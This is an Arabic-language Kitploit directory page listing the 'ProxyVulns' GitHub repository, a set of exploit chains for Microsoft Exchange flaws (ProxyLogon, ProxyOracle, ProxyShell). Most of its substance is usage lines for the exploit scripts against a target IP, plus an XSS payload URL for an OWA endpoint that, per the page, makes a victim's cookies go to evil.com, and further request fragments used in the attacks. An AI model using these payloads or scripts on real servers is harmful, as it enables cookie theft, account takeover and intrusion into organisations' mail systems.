Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ProxyVulns — [ProxyLogon] CVE-2021-26855 وCVE-2021-27065 استغلال ثغرة RawIdentity المُصحَّحة. [ProxyOracle] CVE-2021-31195 وCVE-2021-31196 سلاسل استغلال. [ProxyShell] CVE-2021-34473 وCVE-2021-34523 وCVE-2021-31207 سلاسل استغلال. | Kitploit
أدوات/GitHubGitHub/hosch3n/proxyvulns
أطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubhosch3n/proxyvulns

ProxyVulns

[ProxyLogon] CVE-2021-26855 وCVE-2021-27065 استغلال ثغرة RawIdentity المُصحَّحة. [ProxyOracle] CVE-2021-31195 وCVE-2021-31196 سلاسل استغلال. [ProxyShell] CVE-2021-34473 وCVE-2021-34523 وCVE-2021-31207 سلاسل استغلال.

عرض المستودع
177331منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ProxyVulns

ProxyLogon

Usage: python3 26855.py 1.1.1.1

ProxyOracle

root@kitploit:~
Once a victim clicks this link, evil.com will receive the cookies.

https://ews.lab/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.cookie=`[email protected]:443/path/any.php%23~1941962753`;document.cookie=`X-AnonResource=true`;fetch(`/owa/auth/any.skin`,{credentials:`include`});//
root@kitploit:~
pip3 install pycryptodome

Usage: python3 31196.py 1.1.1.1 'cadata=xxx; cadataTTL=yyy; ...'

ProxyShell

root@kitploit:~
pip3 install pypsrp

Usage: python3 34473.py 1.1.1.1

Usage: python3 31207.py 1.1.1.1 [Local File Path] [UNC Absolute Path]

لا يعمل في بعض إصدارات الهدف (بسبب مسار /@gmail.com)، ربما سيتم إصلاحه لاحقًا

أخرى

  • Cookie: securitytoken=foobar

  • /owa/calendar/[email protected]/foobar/owa14.aspx/.js

المراجع

تحليل ثغرة ProxyLogon (بالصينية)

https://docs.microsoft.com/en-us/exchange/architecture/mailbox-servers/recreate-arbitration-mailboxes?view=exchserver-2019

تحليل ثغرة ProxyOracle (بالصينية)

https://github.com/mwielgoszewski/python-paddingoracle

تحليل ثغرة ProxyShell (بالصينية)

تنزيل الأداة